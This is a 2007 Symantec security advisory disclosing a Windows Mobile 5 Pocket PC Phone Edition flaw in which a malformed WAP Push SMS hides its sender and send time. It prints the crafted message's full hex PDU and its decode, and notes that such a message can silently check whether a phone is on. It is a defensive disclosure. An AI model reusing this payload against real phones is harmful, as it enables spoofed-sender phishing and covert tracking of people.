SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID: SYMSA-2007-011
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition
SMS Handler Issue With Regard to Malformed WAP Push
Messages Hiding Source
Author: Ollie Whitehouse / ollie_whitehouse@xxxxxxxxxxxx
Release Date: 17-10-2007
Application: Microsoft Windows Mobile 5 PocketPC
Platform: Windows
Severity: Information Disclosure
Vendor status: Vendor Reviewed
CVE Number: CVE-2007-5493
Reference: http://www.securityfocus.com/bid/26019
Overview:
Microsoft Windows Mobile 6 is the latest version of Microsoft's
mobile operating system. Designed for small embedded devices,
Windows Mobile is the CE feature set designed for PDA's and mobile
telephones. Microsoft Windows Mobile comes in three distinct
flavors, Pocket PC, Pocket PC Phone Edition and SmartPhone
A vulnerability has been discovered in the SMS handler on
Windows Mobile 2005 Pocket PC Phone edition which means the sender
of the original SMS message can be masked from the recipient when
sent a specifically crafted WAP PUSH message.
Details:
Symantec discovered that a slightly malformed WAP PUSH message
could be used to hide the originating sender of the message on
Windows Mobile 2005. The original PDU can be seen in [1]. The
following PDU will cause the Pocket PC Phone edition SMS handler
to incorrectly decode the PDU. The result of which is both the
sending telephone number and the sending time are incorrect.
[1] PDU (Line wrapped)
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101
The decode of the PDU can be seen in [2]. This decode was achieved
with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message
is received by a SmartPhone it will be silently discarded, which
can also be useful to an attacker who wishes to ascertain if a
cellphone is on without alerting the user through SMS delivery
receipts.
[2] Decode of PDU from PDUSpy
PDU LENGTH IS 118 BYTES
ADDRESS OF DELIVERING SMSC
NUMBER IS : +447785016005
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
MESSAGE HEADER FLAGS
MESSAGE TYPE : SMS SUBMIT
REJECT DUPLICATES : NO
VALIDITY PERIOD : RELATIVE
REPLY PATH : NO
USER DATA HEADER : PRESENT
REQ. STATUS REPORT : NO
MSG REFERENCE NR. : 34 (0x22)
DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific
DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data
VALIDITY OF MESSAGE : 24.0 hrs
USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH : 6 octets
UDH : 05 04 0B 84 23 F0
UDH ELEMENTS : 05 - Appl. port addressing 16bit
4 (0x04) Bytes Information Element
09200 : SOURCE port is: allocated by IANA
02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0
USER DATA (TEXT) : %®?ê¯?´?jEÆ
symantec?Symantec
bulkSMS (Unregistered Ver) -
LogixMobile.com
Vendor Response:
A vulnerability has been discovered in the SMS handler. If a
malicious message with no sender was received by a user on their
device, the user may be enticed in taking action or clicking the
URI that could lead to a second order attack.
Mitigating Factors: By default Windows mobile device policy require
SI messages to be authenticated. The Mobile Operators have the
ability to change the policy to not requiring authentication in
order for 3rd party ring tones and other SI messages.
Microsoft will look into a different architecture in future versions.
Recommendation:
Contact your mobile operator to ensure the proper policy is set on
your device.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
CVE-2007-5493
- -------Symantec Vulnerability Research Advisory Information-------
For questions about this advisory, or to report an error:
research@xxxxxxxxxxxx
For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf
Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/
Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc
- -------------Symantec Product Advisory Information-------------
To Report a Security Vulnerability in a Symantec Product:
secure@xxxxxxxxxxxx
For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/
Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html
Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc
- ---------------------------------------------------------------
Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from research@xxxxxxxxxxxxx
Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.
Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD
1qhcVHQ07YHEdgF0zUP81/k=
=pFeF
-----END PGP SIGNATURE-----